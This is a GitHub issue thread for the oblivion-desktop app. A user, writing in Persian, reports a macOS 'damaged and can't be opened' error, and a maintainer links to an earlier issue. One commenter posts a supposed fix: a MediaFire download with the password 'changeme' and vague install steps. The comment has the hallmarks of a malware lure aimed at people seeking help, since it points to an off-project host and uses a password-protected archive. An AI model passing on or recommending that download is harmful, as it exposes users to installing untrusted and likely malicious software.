### ISSUE TITLE
مشکل اجرا در مک

### ISSUE THREAD

**Issue by zohreh-movahedi** [bepass-org/oblivion-desktop#517]
### Attention | توجه

- [X] I searched and no similar issues were found | جستجو کردم و هیچ گزارش مشابهی پیدا نشد

### What Happened? | چه اتفاقی افتاده؟

با سلام  در مک نرم افزار کلا اجرا نمیشه و ارور میده اسکرین شات اش رو فرستادم ممنون میشم راهکارش رو بگین بهم  نسخه او اس هم sonoma 14 هست
<img width="372" alt="Screenshot 1403-06-10 at 09 47 03" src="https://github.com/user-attachments/assets/9cadcdb0-1d5f-49ad-8897-06d3d8528fee">

### Relevant log output | لاگ برنامه

```shell
“oblivion-desktop” is damaged and can’t be opened. You should move it to the Trash.
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ircfspace** [comment]
سلام
مشاهده کنید: https://github.com/bepass-org/oblivion-desktop/issues/206
